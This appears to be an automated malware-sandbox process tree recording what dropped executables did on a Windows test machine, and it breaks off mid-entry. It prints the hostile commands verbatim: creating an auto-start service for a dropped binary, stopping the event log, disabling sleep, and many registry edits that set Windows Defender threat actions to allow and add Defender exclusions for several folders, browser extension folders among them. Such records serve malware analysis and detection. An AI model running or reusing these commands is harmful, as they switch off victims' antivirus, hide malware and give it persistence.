- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4624
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:3156
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:1592
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:884
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:788
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4164
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:5000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4088 -ip 4088
1⤵
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4088 -ip 4088
1⤵
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1820 -ip 1820
1⤵
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3748 -ip 3748
1⤵
PID:2936

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:996
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1748
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3196
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5040
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2296
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4968
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:4448

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1364

C:\Users\Admin\AppData\Local\Temp\7zS25C3.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS25C3.tmp\Install.exe bC /zpwdidR 525403 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4740
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4452
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1256
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:3604
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2860
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3748
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4148
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:2552
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:784
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:2584
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2884
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4232
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:3388
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:3704
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:4900
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2768
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1368
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4164
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3476
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\reg.exe
